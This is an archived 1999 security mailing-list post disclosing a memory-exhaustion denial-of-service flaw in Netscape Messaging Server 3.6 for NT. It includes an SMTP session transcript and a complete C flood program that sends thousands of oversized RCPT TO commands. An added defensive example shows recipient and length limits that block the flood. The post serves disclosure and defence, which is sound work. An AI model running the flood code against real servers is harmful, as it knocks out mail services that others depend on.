Netscape RCPT TO: vulnerability
Steve Manzuik (smanzuik@NTSECADVICE.COM)
Fri, 29 Oct 1999 14:26:19 -0600
- Next message: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
- Previous message: Markus Gieppner: "Re: IFRAME Vulnerability STILL HERE."
- Next in thread: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
- Reply: David Sandor: "Similar OE5 Issue-> Re: Netscape RCPT TO: vulnerability"
-----Original Message-----
From: Nobuo Miwa [mailto:n-miwa@lac.co.jp]
Sent: Friday, October 29, 1999 12:20 PM
To: smanzuik@ntsecadvice.com
Subject: Re: Netscape Vulnerability
Hi, Steve Manzuik,
> I am the moderator of a new mailing list Win2K Security Advice. The list
> focuses on Windows NT and Microsoft networking vulnerabilities and issues. I
> feel that your posting to Bugtraq would be relevant to my list. Could I
> please ask you to forward your posting to
> win2ksecadvice@listserv.ntsecurity.net.
Sure. You can post my messages freely.
Ciao,
Nobuo Miwa
-=-=- Original Message -=-=-
I've discussed the RCPT TO vulnerability with Netscape's engineer for 7 weeks.
I reported it to them on 7th Sep. as follows...
220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
...
10,000 times
...
Then the victim server's allocated memory size increased until no more
memory was available, and it was never freed after that.
The CPU meter indicated 100% while receiving RCPT TO.
I tested on 128 MB RAM and had no more physical memory after
50 minutes.
I tested on Netscape Messaging Server 3.6 SP2 for NT.
Netscape said that they will release Messaging Server 4.15 for
NT in December and will fix this problem. I guess they will
fix this and other problems at the same time...
I think the vulnerability should be fixed soon with a patch and a
public announcement.
I've already told Netscape that I would post this to BUGTRAQ.
Examination code (rcpt2.c) for YOUR server follows...
------------- cut here -----------------------------------------
/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
whether vulnerable for too much RCPT TO or not.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>          /* close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>       /* inet_addr() */

/* Bare "\n" line endings are kept as in the original test: SMTP requires
   CRLF, but the tested server accepted LF. */
#define STR_HELO     "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000    /* bytes per RCPT TO line */
#define RCPT2_NUMBER 10000   /* RCPT TO commands sent in one session */

/* Connect to port 25 of the given dotted-quad address; returns the socket or -1. */
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    int port = 25, sd, rt;

    memset(si, 0, sizeof(*si));
    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    si->sin_family = AF_INET;
    si->sin_port = htons(port);
    sd = socket(si->sin_family, SOCK_STREAM, 0);
    if (sd == -1) return -1;
    rt = connect(sd, (struct sockaddr *)si, sizeof(struct sockaddr_in));
    if (rt < 0) {
        close(sd);
        return -1;
    }
    return sd;
}

/* Greet the server, then send RCPT2_NUMBER oversized RCPT TO commands
   without ever issuing DATA, so the server's recipient list only grows. */
void sendRCPT2(int sd)
{
    char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH + 80], strn[80];
    int rt, i;

    memset(tmpStr, 0, sizeof(tmpStr));
    recv(sd, tmpStr, sizeof(tmpStr) - 1, 0);          /* 220 banner */
    printf("%s", tmpStr);

    printf("%s", STR_HELO);
    send(sd, STR_HELO, strlen(STR_HELO), 0);
    memset(tmpStr, 0, sizeof(tmpStr));
    rt = recv(sd, tmpStr, sizeof(tmpStr) - 1, 0);
    if (rt > 0) printf("%s", tmpStr);

    printf("%s", STR_MAILFROM);
    send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
    memset(tmpStr, 0, sizeof(tmpStr));
    rt = recv(sd, tmpStr, sizeof(tmpStr) - 1, 0);
    if (rt > 0) printf("%s", tmpStr);

    /* Build "RCPT TO: rcpt2@aaaa...a\n", padded to just under RCPT2_LENGTH bytes. */
    strcpy(rcptStr, "RCPT TO: rcpt2@");
    while (RCPT2_LENGTH - strlen(rcptStr) > 10)
        strcat(rcptStr, "aaaaaaaaaa");
    strcat(rcptStr, "\n");

    for (i = 0; i < RCPT2_NUMBER; i++) {
        printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n", i, (int)strlen(rcptStr));
        send(sd, rcptStr, strlen(rcptStr), 0);
        memset(tmpStr, 0, sizeof(tmpStr));
        rt = recv(sd, tmpStr, sizeof(tmpStr) - 1, 0);
        strncpy(strn, tmpStr, 60);               /* show only the start of the reply */
        strn[60] = '\0';
        if (rt > 0) printf("%s \n", strn);
    }
}

int main(int argc, char *argv[])
{
    char hostIPaddr[80];
    int sd;
    struct sockaddr_in si;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) {
        printf("Usage: %s IPaddress \n", argv[0]);
        exit(1);
    }
    strncpy(hostIPaddr, argv[1], sizeof(hostIPaddr) - 1);
    hostIPaddr[sizeof(hostIPaddr) - 1] = '\0';

    sd = openSocket(&si, hostIPaddr);
    if (sd < 0) {
        printf("failed!\n");
        exit(-1);
    }
    sendRCPT2(sd);
    close(sd);
    return 0;
}
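The flood above works because the server grows per-recipient state on every RCPT TO and bounds neither the recipient count nor the address length, so one connection that never reaches DATA can hold memory until the box is exhausted. The C below is an added example, not part of Nobuo Miwa's post or of Netscape's server code: it shows the checks an SMTP server should run on each RCPT TO before storing anything (RFC 5321 section 4.5.3.1 path, local-part and domain limits, a per-message recipient cap answered with 452, and a per-connection cap answered with 421), then replays the post's 10,000 x 8000-byte pattern against it. The per-connection limit of 1000 and all function and struct names are this example's own assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp */
#include <ctype.h>

/* RFC 5321 section 4.5.3.1 size limits (octets). */
#define MAX_LOCAL_PART        64
#define MAX_DOMAIN           255
#define MAX_PATH             256   /* forward-path including the angle brackets */
#define MAX_RCPT_PER_MSG     100   /* RFC 5321 4.5.3.1.10: a server MUST accept at least 100 */
#define MAX_RCPT_PER_CONN   1000   /* assumption: local policy, not from the RFC or the post */

/* All per-recipient state this example keeps: two counters. A real server would
   append the recipient to a bounded list only after the checks below pass. */
struct smtp_session {
    unsigned rcpt_this_msg;    /* recipients accepted since MAIL FROM */
    unsigned rcpt_attempts;    /* every RCPT TO seen on this connection, accepted or not */
};

/* Validate one RCPT TO line and return the SMTP reply code to send: 250 accepted,
   452 too many recipients for this message, 501 bad or oversized path, 421 too
   many attempts on this connection (the server should then close it). */
int handle_rcpt_to(struct smtp_session *s, const char *line)
{
    const char *p = line, *end, *at;
    size_t local_len, domain_len;

    /* Count before parsing so the cap bites even when every address is rejected. */
    if (++s->rcpt_attempts > MAX_RCPT_PER_CONN)
        return 421;
    if (strncasecmp(p, "RCPT TO:", 8) != 0)
        return 501;
    p += 8;
    while (*p == ' ') p++;
    if (*p == '<') p++;
    end = p;
    while (*end != '\0' && *end != '>' && !isspace((unsigned char)*end))
        end++;

    /* Length limits are enforced before anything is stored or allocated. */
    if ((size_t)(end - p) + 2 > MAX_PATH)
        return 501;
    at = memchr(p, '@', (size_t)(end - p));
    if (at == NULL || at == p || at + 1 == end)
        return 501;
    local_len  = (size_t)(at - p);
    domain_len = (size_t)(end - at - 1);
    if (local_len > MAX_LOCAL_PART || domain_len > MAX_DOMAIN)
        return 501;
    if (memchr(at + 1, '@', domain_len) != NULL)
        return 501;
    if (s->rcpt_this_msg >= MAX_RCPT_PER_MSG)
        return 452;
    s->rcpt_this_msg++;
    return 250;
}

/* Reply code for a single RCPT TO line on a fresh session. */
int single_rcpt_code(const char *line)
{
    struct smtp_session s = { 0, 0 };
    return handle_rcpt_to(&s, line);
}

/* Replay `count` lines of "RCPT TO:<rcpt2@aaa...>" (domain of `domain_len` a's)
   against one session. Returns how many got 250; *last_code gets the final reply. */
int replay_rcpt(unsigned count, size_t domain_len, int *last_code)
{
    static char buf[8200];          /* holds the post's 8000-byte lines */
    struct smtp_session s = { 0, 0 };
    int accepted = 0, code = 0;
    unsigned i;

    if (domain_len > sizeof(buf) - 32)
        return -1;
    memcpy(buf, "RCPT TO:<rcpt2@", 15);
    memset(buf + 15, 'a', domain_len);
    buf[15 + domain_len] = '>';
    buf[16 + domain_len] = '\0';
    for (i = 0; i < count; i++) {
        code = handle_rcpt_to(&s, buf);
        if (code == 250) accepted++;
        if (code == 421) break;     /* the server would drop the connection here */
    }
    if (last_code) *last_code = code;
    return accepted;
}

int replay_last_code(unsigned count, size_t domain_len)
{
    int code = 0;
    replay_rcpt(count, domain_len, &code);
    return code;
}

int main(void)
{
    int code, n = replay_rcpt(10000, 8000, &code);
    printf("8000-byte flood: %d accepted, last reply %d\n", n, code);
    return 0;
}
```

Against these checks the post's session gets 501 for each oversized path and is cut off with 421 after 1000 attempts, with no per-recipient allocation ever made; 150 well-formed recipients in one message get 100 times 250 and then 452, which is the RFC's own way of telling a client to send the rest in another transaction.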
This archive was generated by hypermail 2.0b3 on Fri Oct 29 1999 - 15:24:07 CDT